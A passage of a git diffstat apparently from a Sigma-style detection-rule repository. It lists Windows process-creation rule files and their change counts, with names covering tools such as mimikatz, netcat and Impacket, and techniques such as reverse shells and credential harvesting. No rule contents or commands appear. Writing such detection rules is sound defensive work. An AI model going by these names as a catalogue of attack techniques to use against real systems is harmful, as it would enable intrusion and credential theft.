..._cmd_assoc_tamper_exe_file_association.yml | 26 +- ...c_creation_win_cmd_copy_dmp_from_share.yml | 12 +- ...ation_win_cmd_curl_download_exec_combo.yml | 7 +- .../proc_creation_win_cmd_del_execution.yml | 33 +- ...c_creation_win_cmd_del_greedy_deletion.yml | 14 +- .../proc_creation_win_cmd_dir_execution.yml | 5 +- .../proc_creation_win_cmd_dosfuscation.yml | 5 +- .../proc_creation_win_cmd_http_appdata.yml | 8 +- .../proc_creation_win_cmd_mklink_osk_cmd.yml | 11 +- ...md_mklink_shadow_copies_access_symlink.yml | 5 +- ...reation_win_cmd_net_use_and_exec_combo.yml | 12 +- ...oc_creation_win_cmd_no_space_execution.yml | 33 +- ...oc_creation_win_cmd_ntdllpipe_redirect.yml | 6 +- .../proc_creation_win_cmd_path_traversal.yml | 31 +- 
...n_win_cmd_ping_copy_combined_execution.yml | 14 +- ...on_win_cmd_ping_del_combined_execution.yml | 16 +- .../proc_creation_win_cmd_redirect.yml | 18 +- ...eation_win_cmd_redirection_susp_folder.yml | 28 +- .../proc_creation_win_cmd_rmdir_execution.yml | 23 +- ...roc_creation_win_cmd_shadowcopy_access.yml | 7 +- .../proc_creation_win_cmd_stdin_redirect.yml | 10 +- ...cmd_sticky_key_like_backdoor_execution.yml | 10 +- ...c_creation_win_cmd_sticky_keys_replace.yml | 10 +- ...eation_win_cmdkey_adding_generic_creds.yml | 9 +- .../proc_creation_win_cmdkey_recon.yml | 9 +- ...eation_win_cmstp_execution_by_creation.yml | 4 +- ...roc_creation_win_conhost_legacy_option.yml | 6 +- ...oc_creation_win_conhost_path_traversal.yml | 5 +- ...reation_win_conhost_susp_child_process.yml | 10 +- ...c_creation_win_conhost_uncommon_parent.yml | 11 +- .../proc_creation_win_control_panel_item.yml | 15 +- ...eation_win_createdump_lolbin_execution.yml | 14 +- ...ation_win_csc_susp_dynamic_compilation.yml | 55 +- .../proc_creation_win_csc_susp_parent.yml | 66 +- .../proc_creation_win_csi_execution.yml | 18 +- ...creation_win_csi_use_of_csharp_console.yml | 3 +- .../proc_creation_win_csvde_export.yml | 11 +- ...roc_creation_win_curl_cookie_hijacking.yml | 11 +- ...oc_creation_win_curl_custom_user_agent.yml | 12 +- ...ation_win_curl_download_direct_ip_exec.yml | 19 +- ...url_download_direct_ip_susp_extensions.yml | 18 +- ...url_download_susp_file_sharing_domains.yml | 19 +- ..._creation_win_curl_insecure_connection.yml | 8 +- ...reation_win_curl_insecure_porxy_or_doh.yml | 9 +- ...proc_creation_win_curl_local_file_read.yml | 9 +- .../proc_creation_win_curl_susp_download.yml | 26 +- ...desktopimgdownldr_remote_file_download.yml | 6 +- ...n_win_desktopimgdownldr_susp_execution.yml | 12 +- ...ion_win_deviceenroller_dll_sideloading.yml | 20 +- ...proc_creation_win_devinit_lolbin_usage.yml | 6 +- ...n_win_dfsvc_suspicious_child_processes.yml | 4 +- .../proc_creation_win_dirlister_execution.yml | 
8 +- ...tion_win_diskshadow_child_process_susp.yml | 24 +- ...on_win_diskshadow_script_mode_susp_ext.yml | 36 +- ...n_diskshadow_script_mode_susp_location.yml | 31 +- ..._creation_win_dll_sideload_vmware_xfer.yml | 5 +- ..._creation_win_dllhost_no_cli_execution.yml | 8 +- ...n_win_dns_exfiltration_tools_execution.yml | 4 +- ...oc_creation_win_dns_susp_child_process.yml | 4 +- .../proc_creation_win_dnscmd_discovery.yml | 5 +- ...md_install_new_server_level_plugin_dll.yml | 14 +- ...tion_win_dotnet_trace_lolbin_execution.yml | 6 +- .../proc_creation_win_driverquery_recon.yml | 31 +- .../proc_creation_win_driverquery_usage.yml | 35 +- ..._creation_win_dsacls_abuse_permissions.yml | 8 +- ...roc_creation_win_dsacls_password_spray.yml | 6 +- .../proc_creation_win_dsim_remove.yml | 13 +- ...ion_win_dsquery_domain_trust_discovery.yml | 14 +- .../proc_creation_win_dtrace_kernel_dump.yml | 7 +- ...oc_creation_win_dumpminitool_execution.yml | 21 +- ...eation_win_dumpminitool_susp_execution.yml | 27 +- .../proc_creation_win_esentutl_params.yml | 6 +- ...ation_win_esentutl_sensitive_file_copy.yml | 16 +- .../proc_creation_win_esentutl_webcache.yml | 11 +- ...eation_win_eventvwr_susp_child_process.yml | 7 +- ...proc_creation_win_expand_cabinet_files.yml | 31 +- ...eation_win_explorer_break_process_tree.yml | 24 +- ...creation_win_explorer_lolbin_execution.yml | 2 +- .../proc_creation_win_explorer_nouaccheck.yml | 10 +- .../proc_creation_win_findstr_download.yml | 26 +- ...roc_creation_win_findstr_gpp_passwords.yml | 17 +- .../proc_creation_win_findstr_lnk.yml | 17 +- .../proc_creation_win_findstr_lsass.yml | 19 +- ...oc_creation_win_findstr_recon_everyone.yml | 28 +- ...creation_win_findstr_recon_pipe_output.yml | 15 +- ...on_win_findstr_security_keyword_lookup.yml | 31 +- ..._creation_win_findstr_subfolder_search.yml | 25 +- ..._sysmon_discovery_via_default_altitude.yml | 18 +- .../proc_creation_win_finger_usage.yml | 7 +- .../proc_creation_win_fltmc_unload_driver.yml | 13 +- 
...reation_win_fltmc_unload_driver_sysmon.yml | 10 +- ...in_forfiles_child_process_masquerading.yml | 12 +- ...creation_win_forfiles_proxy_execution_.yml | 27 +- ..._creation_win_fsutil_drive_enumeration.yml | 6 +- ..._creation_win_fsutil_symlinkevaluation.yml | 16 +- .../proc_creation_win_fsutil_usage.yml | 19 +- ...ownloadwrapper_arbitrary_file_download.yml | 7 +- .../proc_creation_win_git_susp_clone.yml | 17 +- ...on_win_googleupdate_susp_child_process.yml | 17 +- .../proc_creation_win_gpg4win_decryption.yml | 10 +- .../proc_creation_win_gpg4win_encryption.yml | 10 +- ...reation_win_gpg4win_portable_execution.yml | 13 +- ...roc_creation_win_gpg4win_susp_location.yml | 17 +- .../proc_creation_win_gpresult_execution.yml | 5 +- ...ion_win_gup_arbitrary_binary_execution.yml | 7 +- .../proc_creation_win_gup_download.yml | 12 +- ..._creation_win_gup_suspicious_execution.yml | 3 +- .../proc_creation_win_hh_chm_execution.yml | 6 +- ...in_hh_chm_remote_download_or_execution.yml | 9 +- .../proc_creation_win_hh_susp_execution.yml | 11 +- .../proc_creation_win_hktl_adcspwn.yml | 6 +- ...reation_win_hktl_bloodhound_sharphound.yml | 25 +- ..._creation_win_hktl_c3_rundll32_pattern.yml | 2 +- .../proc_creation_win_hktl_certify.yml | 13 +- .../proc_creation_win_hktl_certipy.yml | 13 +- ...ion_win_hktl_cobaltstrike_bloopers_cmd.yml | 15 +- ...win_hktl_cobaltstrike_bloopers_modules.yml | 10 +- ...win_hktl_cobaltstrike_load_by_rundll32.yml | 17 +- ...win_hktl_cobaltstrike_process_patterns.yml | 8 +- .../proc_creation_win_hktl_coercedpotato.yml | 18 +- .../proc_creation_win_hktl_covenant.yml | 6 +- ...eation_win_hktl_crackmapexec_execution.yml | 21 +- ...n_hktl_crackmapexec_execution_patterns.yml | 7 +- ...reation_win_hktl_crackmapexec_patterns.yml | 13 +- ...tl_crackmapexec_powershell_obfuscation.yml | 20 +- .../proc_creation_win_hktl_createminidump.yml | 9 +- .../proc_creation_win_hktl_dinjector.yml | 7 +- .../proc_creation_win_hktl_dumpert.yml | 7 +- 
.../proc_creation_win_hktl_edrsilencer.yml | 13 +- ...tion_win_hktl_empire_powershell_launch.yml | 2 +- ..._win_hktl_empire_powershell_uac_bypass.yml | 2 +- .../proc_creation_win_hktl_evil_winrm.yml | 6 +- ...ation_win_hktl_execution_via_imphashes.yml | 355 +- ...ion_win_hktl_execution_via_pe_metadata.yml | 5 +- .../proc_creation_win_hktl_gmer.yml | 6 +- .../proc_creation_win_hktl_handlekatz.yml | 21 +- .../proc_creation_win_hktl_hashcat.yml | 5 +- ...c_creation_win_hktl_htran_or_natbypass.yml | 5 +- .../proc_creation_win_hktl_hydra.yml | 7 +- ...ion_win_hktl_impacket_lateral_movement.yml | 38 +- .../proc_creation_win_hktl_impacket_tools.yml | 92 +- .../proc_creation_win_hktl_impersonate.yml | 13 +- .../proc_creation_win_hktl_inveigh.yml | 25 +- ...ation_win_hktl_invoke_obfuscation_clip.yml | 9 +- ...obfuscation_obfuscated_iex_commandline.yml | 17 +- ...tion_win_hktl_invoke_obfuscation_stdin.yml | 17 +- ...eation_win_hktl_invoke_obfuscation_var.yml | 9 +- ...n_hktl_invoke_obfuscation_via_compress.yml | 6 +- ..._win_hktl_invoke_obfuscation_via_stdin.yml | 7 +- ...n_hktl_invoke_obfuscation_via_use_clip.yml | 9 +- ..._hktl_invoke_obfuscation_via_use_mhsta.yml | 4 +- ...on_win_hktl_invoke_obfuscation_via_var.yml | 9 +- ...eation_win_hktl_jlaive_batch_execution.yml | 6 +- .../proc_creation_win_hktl_koadic.yml | 6 +- .../proc_creation_win_hktl_krbrelay.yml | 10 +- .../proc_creation_win_hktl_krbrelayup.yml | 13 +- .../proc_creation_win_hktl_localpotato.yml | 5 +- ...reation_win_hktl_meterpreter_getsystem.yml | 19 +- ...reation_win_hktl_mimikatz_command_line.yml | 33 +- .../proc_creation_win_hktl_pchunter.yml | 31 +- ...tl_powersploit_empire_default_schtasks.yml | 4 +- .../proc_creation_win_hktl_powertool.yml | 12 +- ...eation_win_hktl_purplesharp_indicators.yml | 6 +- .../proc_creation_win_hktl_pypykatz.yml | 6 +- .../proc_creation_win_hktl_quarks_pwdump.yml | 2 +- ...on_win_hktl_redmimicry_winnti_playbook.yml | 5 +- ..._creation_win_hktl_relay_attacks_tools.yml | 17 +- 
.../proc_creation_win_hktl_rubeus.yml | 45 +- .../proc_creation_win_hktl_safetykatz.yml | 9 +- .../proc_creation_win_hktl_secutyxploded.yml | 6 +- .../proc_creation_win_hktl_selectmyparent.yml | 61 +- .../proc_creation_win_hktl_sharp_chisel.yml | 9 +- ..._creation_win_hktl_sharp_impersonation.yml | 29 +- ...c_creation_win_hktl_sharp_ldap_monitor.yml | 9 +- .../proc_creation_win_hktl_sharpersist.yml | 15 +- .../proc_creation_win_hktl_sharpevtmute.yml | 17 +- ...proc_creation_win_hktl_sharpldapwhoami.yml | 11 +- .../proc_creation_win_hktl_sharpup.yml | 20 +- .../proc_creation_win_hktl_sharpview.yml | 203 +- ...creation_win_hktl_silenttrinity_stager.yml | 4 +- ...n_win_hktl_sliver_c2_execution_pattern.yml | 5 +- ...ation_win_hktl_stracciatella_execution.yml | 23 +- .../proc_creation_win_hktl_sysmoneop.yml | 12 +- .../proc_creation_win_hktl_trufflesnout.yml | 7 +- .../proc_creation_win_hktl_uacme.yml | 29 +- .../proc_creation_win_hktl_wce.yml | 14 +- .../proc_creation_win_hktl_winpeas.yml | 43 +- .../proc_creation_win_hktl_winpwn.yml | 12 +- ...on_win_hktl_wmiexec_default_powershell.yml | 5 +- .../proc_creation_win_hktl_xordump.yml | 12 +- .../proc_creation_win_hktl_zipexec.yml | 7 +- .../proc_creation_win_hwp_exploits.yml | 3 +- .../proc_creation_win_hxtsr_masquerading.yml | 15 +- .../proc_creation_win_icacls_deny.yml | 11 +- .../proc_creation_win_ieexec_download.yml | 6 +- ...c_creation_win_iis_appcmd_http_logging.yml | 9 +- ...appcmd_service_account_password_dumped.yml | 24 +- ...ion_win_iis_appcmd_susp_module_install.yml | 11 +- ...ation_win_iis_appcmd_susp_rewrite_rule.yml | 10 +- ..._win_iis_connection_strings_decryption.yml | 11 +- ...ation_win_iis_susp_module_registration.yml | 9 +- ...ion_win_imagingdevices_unusual_parents.yml | 5 +- .../proc_creation_win_imewbdld_download.yml | 11 +- ..._infdefaultinstall_execute_sct_scripts.yml | 5 +- ...proc_creation_win_installutil_download.yml | 12 +- ...eation_win_instalutil_no_log_execution.yml | 5 +- 
...on_win_java_keytool_susp_child_process.yml | 3 +- ...n_java_manageengine_susp_child_process.yml | 13 +- ...roc_creation_win_java_remote_debugging.yml | 9 +- ...c_creation_win_java_susp_child_process.yml | 9 +- ...creation_win_java_susp_child_process_2.yml | 11 +- ...n_java_sysaidserver_susp_child_process.yml | 3 +- .../proc_creation_win_kd_execution.yml | 7 +- ...on_win_ksetup_password_change_computer.yml | 9 +- ...eation_win_ksetup_password_change_user.yml | 6 +- .../proc_creation_win_ldifde_export.yml | 11 +- .../proc_creation_win_ldifde_file_load.yml | 13 +- ...n_lodctr_performance_counter_tampering.yml | 7 +- ...c_creation_win_logman_disable_eventlog.yml | 13 +- .../proc_creation_win_lolbin_cdb.yml | 11 +- ...creation_win_lolbin_class_exec_xwizard.yml | 7 +- .../proc_creation_win_lolbin_cmdl32.yml | 6 +- ...eation_win_lolbin_configsecuritypolicy.yml | 11 +- ...oc_creation_win_lolbin_customshellhost.yml | 3 +- ...data_exfiltration_by_using_datasvcutil.yml | 13 +- ...eation_win_lolbin_dctask64_proc_inject.yml | 2 +- .../proc_creation_win_lolbin_defaultpack.yml | 3 +- ...in_lolbin_device_credential_deployment.yml | 3 +- ...c_creation_win_lolbin_devtoolslauncher.yml | 2 +- .../proc_creation_win_lolbin_diantz_ads.yml | 7 +- ..._creation_win_lolbin_diantz_remote_cab.yml | 5 +- ...eation_win_lolbin_dll_sideload_xwizard.yml | 3 +- .../proc_creation_win_lolbin_dotnet.yml | 6 +- .../proc_creation_win_lolbin_dotnet_dump.yml | 13 +- .../proc_creation_win_lolbin_dump64.yml | 8 +- .../proc_creation_win_lolbin_extexport.yml | 9 +- .../proc_creation_win_lolbin_extrac32.yml | 10 +- .../proc_creation_win_lolbin_extrac32_ads.yml | 4 +- .../proc_creation_win_lolbin_format.yml | 8 +- ...reation_win_lolbin_fsharp_interpreters.yml | 11 +- .../proc_creation_win_lolbin_ftp.yml | 9 +- ...reation_win_lolbin_gather_network_info.yml | 25 +- .../proc_creation_win_lolbin_gpscript.yml | 9 +- .../proc_creation_win_lolbin_ie4uinit.yml | 12 +- .../proc_creation_win_lolbin_ilasm.yml | 4 +- 
.../proc_creation_win_lolbin_jsc.yml | 5 +- .../proc_creation_win_lolbin_kavremover.yml | 10 +- ..._creation_win_lolbin_launch_vsdevshell.yml | 7 +- .../proc_creation_win_lolbin_manage_bde.yml | 12 +- ...win_lolbin_mavinject_process_injection.yml | 13 +- .../proc_creation_win_lolbin_mpiexec.yml | 11 +- .../proc_creation_win_lolbin_msdeploy.yml | 2 +- ...c_creation_win_lolbin_msdt_answer_file.yml | 8 +- .../proc_creation_win_lolbin_openconsole.yml | 9 +- .../proc_creation_win_lolbin_openwith.yml | 2 +- .../proc_creation_win_lolbin_pcalua.yml | 13 +- .../proc_creation_win_lolbin_pcwrun.yml | 6 +- ...roc_creation_win_lolbin_pcwrun_follina.yml | 5 +- .../proc_creation_win_lolbin_pcwutl.yml | 9 +- .../proc_creation_win_lolbin_pester.yml | 7 +- .../proc_creation_win_lolbin_pester_1.yml | 9 +- .../proc_creation_win_lolbin_printbrm.yml | 5 +- .../proc_creation_win_lolbin_pubprn.yml | 5 +- ...tion_win_lolbin_rasautou_dll_execution.yml | 14 +- .../proc_creation_win_lolbin_register_app.yml | 8 +- .../proc_creation_win_lolbin_remote.yml | 7 +- .../proc_creation_win_lolbin_replace.yml | 5 +- .../proc_creation_win_lolbin_runexehelper.yml | 3 +- ...oc_creation_win_lolbin_runscripthelper.yml | 2 +- .../proc_creation_win_lolbin_scriptrunner.yml | 9 +- .../proc_creation_win_lolbin_setres.yml | 4 +- .../proc_creation_win_lolbin_sftp.yml | 10 +- ...eation_win_lolbin_sideload_link_binary.yml | 7 +- .../proc_creation_win_lolbin_sigverif.yml | 3 +- .../proc_creation_win_lolbin_ssh.yml | 9 +- ...eation_win_lolbin_susp_acccheckconsole.yml | 9 +- ...proc_creation_win_lolbin_susp_atbroker.yml | 4 +- ...ation_win_lolbin_susp_certreq_download.yml | 9 +- ...olbin_susp_driver_installed_by_pnputil.yml | 11 +- .../proc_creation_win_lolbin_susp_dxcap.yml | 6 +- .../proc_creation_win_lolbin_susp_grpconv.yml | 5 +- ...ion_win_lolbin_susp_sqldumper_activity.yml | 2 +- ...n_syncappvpublishingserver_execute_psh.yml | 10 +- ...ncappvpublishingserver_vbs_execute_psh.yml | 4 +- 
.../proc_creation_win_lolbin_tracker.yml | 12 +- .../proc_creation_win_lolbin_ttdinject.yml | 7 +- ..._creation_win_lolbin_tttracer_mod_load.yml | 9 +- .../proc_creation_win_lolbin_type.yml | 10 +- .../proc_creation_win_lolbin_unregmp2.yml | 9 +- ...c_creation_win_lolbin_utilityfunctions.yml | 5 +- ...ation_win_lolbin_visual_basic_compiler.yml | 5 +- ...ation_win_lolbin_visualuiaverifynative.yml | 7 +- ...c_creation_win_lolbin_vsiisexelauncher.yml | 9 +- .../proc_creation_win_lolbin_wfc.yml | 7 +- .../proc_creation_win_lolbin_wlrmdr.yml | 12 +- ..._creation_win_lolbin_workflow_compiler.yml | 7 +- ...oc_creation_win_lolscript_register_app.yml | 19 +- .../proc_creation_win_lsass_process_clone.yml | 3 +- ..._creation_win_malware_conti_shadowcopy.yml | 9 +- ...oc_creation_win_malware_script_dropper.yml | 4 +- ...roc_creation_win_mftrace_child_process.yml | 3 +- ...reation_win_mmc_mmc20_lateral_movement.yml | 6 +- ...oc_creation_win_mmc_susp_child_process.yml | 22 +- .../proc_creation_win_mofcomp_execution.yml | 55 +- ...ion_win_mpcmdrun_dll_sideload_defender.yml | 7 +- ...n_win_mpcmdrun_download_arbitrary_file.yml | 10 +- ...run_remove_windows_defender_definition.yml | 9 +- ...eation_win_msbuild_susp_parent_process.yml | 4 +- ...n_win_msdt_arbitrary_command_execution.yml | 16 +- ...roc_creation_win_msdt_susp_cab_options.yml | 13 +- .../proc_creation_win_msdt_susp_parent.yml | 8 +- ...roc_creation_win_msedge_proxy_download.yml | 6 +- .../proc_creation_win_mshta_http.yml | 10 +- ...roc_creation_win_mshta_inline_vbscript.yml | 8 +- .../proc_creation_win_mshta_javascript.yml | 6 +- ...creation_win_mshta_lethalhta_technique.yml | 3 +- ...reation_win_mshta_susp_child_processes.yml | 45 +- ...proc_creation_win_mshta_susp_execution.yml | 10 +- .../proc_creation_win_mshta_susp_pattern.yml | 32 +- .../proc_creation_win_msiexec_dll.yml | 8 +- .../proc_creation_win_msiexec_embedding.yml | 13 +- .../proc_creation_win_msiexec_execute_dll.yml | 17 +- 
...roc_creation_win_msiexec_install_quiet.yml | 20 +- ...oc_creation_win_msiexec_install_remote.yml | 16 +- ...proc_creation_win_msiexec_masquerading.yml | 4 +- .../proc_creation_win_msiexec_web_install.yml | 9 +- .../proc_creation_win_msohtmed_download.yml | 6 +- .../proc_creation_win_mspub_download.yml | 9 +- ...oc_creation_win_msra_process_injection.yml | 5 +- ...reation_win_mssql_sqlps_susp_execution.yml | 21 +- ...on_win_mssql_sqltoolsps_susp_execution.yml | 20 +- ..._creation_win_mssql_susp_child_process.yml | 10 +- ...n_win_mssql_veaam_susp_child_processes.yml | 9 +- ...reation_win_mstsc_rdp_hijack_shadowing.yml | 2 +- ...c_creation_win_mstsc_remote_connection.yml | 19 +- ..._creation_win_mstsc_run_local_rdp_file.yml | 8 +- ...mstsc_run_local_rdp_file_susp_location.yml | 15 +- ...n_mstsc_run_local_rpd_file_susp_parent.yml | 9 +- .../proc_creation_win_msxsl_execution.yml | 12 +- ...oc_creation_win_msxsl_remote_execution.yml | 5 +- ..._win_net_default_accounts_manipulation.yml | 78 +- ...tion_win_net_groups_and_accounts_recon.yml | 48 +- ..._win_net_network_connections_discovery.yml | 28 +- ...eation_win_net_share_and_sessions_enum.yml | 19 +- .../proc_creation_win_net_share_unmount.yml | 18 +- .../proc_creation_win_net_start_service.yml | 17 +- .../proc_creation_win_net_stop_service.yml | 21 +- .../proc_creation_win_net_susp_execution.yml | 20 +- ...creation_win_net_use_mount_admin_share.yml | 21 +- ...ation_win_net_use_mount_internet_share.yml | 17 +- .../proc_creation_win_net_use_mount_share.yml | 18 +- ...reation_win_net_use_password_plaintext.yml | 16 +- .../proc_creation_win_net_user_add.yml | 18 +- ...creation_win_net_user_add_never_expire.yml | 21 +- .../proc_creation_win_netsh_fw_add_rule.yml | 14 +- ...etsh_fw_allow_program_in_susp_location.yml | 31 +- .../proc_creation_win_netsh_fw_allow_rdp.yml | 14 +- ...proc_creation_win_netsh_fw_delete_rule.yml | 11 +- .../proc_creation_win_netsh_fw_disable.yml | 12 +- 
...reation_win_netsh_fw_enable_group_rule.yml | 9 +- ..._creation_win_netsh_fw_rules_discovery.yml | 11 +- .../proc_creation_win_netsh_fw_set_rule.yml | 11 +- ...ation_win_netsh_helper_dll_persistence.yml | 21 +- ...proc_creation_win_netsh_packet_capture.yml | 9 +- ...roc_creation_win_netsh_port_forwarding.yml | 25 +- ...reation_win_netsh_port_forwarding_3389.yml | 9 +- ...n_win_netsh_wifi_credential_harvesting.yml | 6 +- .../proc_creation_win_nltest_execution.yml | 12 +- .../proc_creation_win_nltest_recon.yml | 40 +- .../proc_creation_win_node_abuse.yml | 9 +- ...on_win_node_adobe_creative_cloud_abuse.yml | 5 +- ...creation_win_nslookup_domain_discovery.yml | 8 +- ...eation_win_nslookup_poweshell_download.yml | 17 +- .../proc_creation_win_ntdsutil_susp_usage.yml | 28 +- .../proc_creation_win_ntdsutil_usage.yml | 3 +- ...c_creation_win_odbcconf_driver_install.yml | 18 +- ...ation_win_odbcconf_driver_install_susp.yml | 17 +- ...ation_win_odbcconf_exec_susp_locations.yml | 10 +- ...ation_win_odbcconf_register_dll_regsvr.yml | 22 +- ..._win_odbcconf_register_dll_regsvr_susp.yml | 17 +- ...oc_creation_win_odbcconf_response_file.yml | 27 +- ...eation_win_odbcconf_response_file_susp.yml | 22 +- ...on_win_odbcconf_uncommon_child_process.yml | 7 +- ...tion_win_office_arbitrary_cli_download.yml | 22 +- ...win_office_excel_dcom_lateral_movement.yml | 22 +- ...win_office_exec_from_trusted_locations.yml | 27 +- ...in_office_onenote_susp_child_processes.yml | 160 +- ...utlook_enable_unsafe_client_mail_rules.yml | 9 +- ...in_office_outlook_susp_child_processes.yml | 32 +- ...ce_outlook_susp_child_processes_remote.yml | 7 +- ..._office_spawn_exe_from_users_directory.yml | 4 +- ...eation_win_office_susp_child_processes.yml | 168 +- ...c_creation_win_office_winword_dll_load.yml | 13 +- ...flinescannershell_mpclient_sideloading.yml | 16 +- .../proc_creation_win_pdqdeploy_execution.yml | 12 +- ...ion_win_pdqdeploy_runner_susp_children.yml | 68 +- 
...tion_win_perl_inline_command_execution.yml | 9 +- ...ation_win_php_inline_command_execution.yml | 9 +- .../proc_creation_win_ping_hex_ip.yml | 2 +- .../proc_creation_win_pktmon_execution.yml | 4 +- ...roc_creation_win_plink_port_forwarding.yml | 2 +- ...proc_creation_win_plink_susp_tunneling.yml | 10 +- .../proc_creation_win_powercfg_execution.yml | 26 +- ...ershell_aadinternals_cmdlets_execution.yml | 23 +- ...ell_active_directory_module_dll_import.yml | 27 +- ..._win_powershell_add_windows_capability.yml | 26 +- ...win_powershell_amsi_init_failed_bypass.yml | 11 +- ...n_win_powershell_amsi_null_bits_bypass.yml | 9 +- ..._creation_win_powershell_audio_capture.yml | 5 +- ...tion_win_powershell_base64_encoded_cmd.yml | 31 +- ...win_powershell_base64_frombase64string.yml | 14 +- ...roc_creation_win_powershell_base64_iex.yml | 49 +- ..._creation_win_powershell_base64_invoke.yml | 23 +- ...ion_win_powershell_base64_mppreference.yml | 40 +- ...rshell_base64_reflection_assembly_load.yml | 10 +- ...base64_reflection_assembly_load_obfusc.yml | 15 +- ...tion_win_powershell_base64_wmi_classes.yml | 34 +- ..._creation_win_powershell_cl_invocation.yml | 6 +- ...reation_win_powershell_cl_loadassembly.yml | 7 +- ...ation_win_powershell_cl_mutexverifiers.yml | 12 +- ...ershell_cmdline_convertto_securestring.yml | 17 +- ...in_powershell_cmdline_reversed_strings.yml | 24 +- ..._powershell_cmdline_special_characters.yml | 29 +- ...hell_computer_discovery_get_adcomputer.yml | 26 +- ...creation_win_powershell_create_service.yml | 6 +- ...oc_creation_win_powershell_decode_gzip.yml | 6 +- ...reation_win_powershell_decrypt_pattern.yml | 27 +- ...in_powershell_defender_disable_feature.yml | 14 +- ...tion_win_powershell_defender_exclusion.yml | 11 +- ...isable_defender_av_security_monitoring.yml | 31 +- ...eation_win_powershell_disable_firewall.yml | 22 +- ...ion_win_powershell_disable_ie_features.yml | 9 +- ..._creation_win_powershell_dll_execution.yml | 25 +- 
...eation_win_powershell_downgrade_attack.yml | 9 +- ...on_win_powershell_download_com_cradles.yml | 11 +- ...eation_win_powershell_download_cradles.yml | 2 +- ...c_creation_win_powershell_download_dll.yml | 7 +- ...c_creation_win_powershell_download_iex.yml | 7 +- ...ation_win_powershell_download_patterns.yml | 23 +- ...oc_creation_win_powershell_email_exfil.yml | 2 +- ...l_enable_susp_windows_optional_feature.yml | 19 +- .../proc_creation_win_powershell_encode.yml | 4 +- ...on_win_powershell_encoded_cmd_patterns.yml | 22 +- ...creation_win_powershell_encoded_obfusc.yml | 13 +- ...ation_win_powershell_encoding_patterns.yml | 30 +- ...creation_win_powershell_exec_data_file.yml | 6 +- ...tion_win_powershell_export_certificate.yml | 13 +- ...eation_win_powershell_frombase64string.yml | 5 +- ...in_powershell_frombase64string_archive.yml | 9 +- ..._creation_win_powershell_get_clipboard.yml | 6 +- ...powershell_get_localgroup_member_recon.yml | 21 +- ...eation_win_powershell_getprocess_lsass.yml | 6 +- ...creation_win_powershell_hidden_b64_cmd.yml | 19 +- ...wershell_hide_services_via_set_service.yml | 21 +- ...c_creation_win_powershell_iex_patterns.yml | 6 +- ..._powershell_import_cert_susp_locations.yml | 7 +- ...win_powershell_import_module_susp_dirs.yml | 7 +- ...ershell_install_unsigned_appx_packages.yml | 23 +- ...ion_win_powershell_invocation_specific.yml | 26 +- ...powershell_invoke_webrequest_direct_ip.yml | 21 +- ..._powershell_invoke_webrequest_download.yml | 26 +- ...ion_win_powershell_mailboxexport_share.yml | 5 +- ...ation_win_powershell_malicious_cmdlets.yml | 27 +- ..._powershell_msexchange_transport_agent.yml | 9 +- ...n_powershell_non_interactive_execution.yml | 26 +- ...on_win_powershell_obfuscation_via_utf8.yml | 2 +- ..._creation_win_powershell_public_folder.yml | 5 +- ...wershell_remotefxvgpudisablement_abuse.yml | 18 +- ...in_powershell_reverse_shell_connection.yml | 18 +- ...ion_win_powershell_run_script_from_ads.yml | 2 +- 
...owershell_run_script_from_input_stream.yml | 2 +- ...roc_creation_win_powershell_sam_access.yml | 4 +- ...on_win_powershell_script_engine_parent.yml | 3 +- ..._service_dacl_modification_set_service.yml | 18 +- .../proc_creation_win_powershell_set_acl.yml | 26 +- ...n_win_powershell_set_acl_susp_location.yml | 34 +- ...ershell_set_policies_to_unsecure_level.yml | 31 +- ...on_win_powershell_set_service_disabled.yml | 11 +- ...ion_win_powershell_shadowcopy_deletion.yml | 18 +- ...reation_win_powershell_snapins_hafnium.yml | 23 +- ...c_creation_win_powershell_stop_service.yml | 21 +- ...on_win_powershell_susp_child_processes.yml | 8 +- ..._win_powershell_susp_download_patterns.yml | 10 +- ...in_powershell_susp_parameter_variation.yml | 5 +- ...ion_win_powershell_susp_parent_process.yml | 76 +- ...reation_win_powershell_susp_ps_appdata.yml | 9 +- ...on_win_powershell_susp_ps_downloadfile.yml | 5 +- ...ll_tamper_defender_remove_mppreference.yml | 11 +- ...ation_win_powershell_token_obfuscation.yml | 16 +- ...n_powershell_user_discovery_get_aduser.yml | 26 +- ...eation_win_powershell_webclient_casing.yml | 18 +- ...creation_win_powershell_x509enrollment.yml | 6 +- ...reation_win_powershell_xor_commandline.yml | 27 +- ...c_creation_win_powershell_zip_compress.yml | 28 +- ...creation_win_presentationhost_download.yml | 9 +- ...resentationhost_uncommon_location_exec.yml | 15 +- ...ation_win_pressanykey_lolbin_execution.yml | 10 +- ...oc_creation_win_print_remote_file_copy.yml | 6 +- ..._creation_win_protocolhandler_download.yml | 12 +- ...reation_win_provlaunch_potential_abuse.yml | 54 +- ...tion_win_provlaunch_susp_child_process.yml | 53 +- ...c_creation_win_psr_capture_screenshots.yml | 5 +- ...proc_creation_win_pua_3proxy_execution.yml | 4 +- ...oc_creation_win_pua_adfind_enumeration.yml | 19 +- ...roc_creation_win_pua_adfind_susp_usage.yml | 13 +- ...c_creation_win_pua_advanced_ip_scanner.yml | 11 +- ...creation_win_pua_advanced_port_scanner.yml | 8 +- 
.../proc_creation_win_pua_advancedrun.yml | 20 +- ...creation_win_pua_advancedrun_priv_user.yml | 29 +- .../proc_creation_win_pua_chisel.yml | 8 +- .../proc_creation_win_pua_cleanwipe.yml | 6 +- .../proc_creation_win_pua_crassus.yml | 9 +- .../proc_creation_win_pua_csexec.yml | 3 +- .../proc_creation_win_pua_defendercheck.yml | 8 +- .../proc_creation_win_pua_ditsnap.yml | 7 +- .../proc_creation_win_pua_frp.yml | 20 +- .../proc_creation_win_pua_iox.yml | 20 +- ...c_creation_win_pua_mouselock_execution.yml | 10 +- .../proc_creation_win_pua_netcat.yml | 9 +- .../proc_creation_win_pua_ngrok.yml | 15 +- .../proc_creation_win_pua_nimgrab.yml | 9 +- .../proc_creation_win_pua_nircmd.yml | 13 +- ...proc_creation_win_pua_nircmd_as_system.yml | 2 +- .../proc_creation_win_pua_nmap_zenmap.yml | 16 +- .../proc_creation_win_pua_nps.yml | 22 +- .../proc_creation_win_pua_nsudo.yml | 32 +- .../proc_creation_win_pua_pingcastle.yml | 317 +- ...ation_win_pua_pingcastle_script_parent.yml | 86 +- .../proc_creation_win_pua_process_hacker.yml | 56 +- .../proc_creation_win_pua_radmin.yml | 9 +- ...proc_creation_win_pua_rcedit_execution.yml | 21 +- ...proc_creation_win_pua_rclone_execution.yml | 19 +- .../proc_creation_win_pua_runxcmd.yml | 7 +- .../proc_creation_win_pua_seatbelt.yml | 44 +- 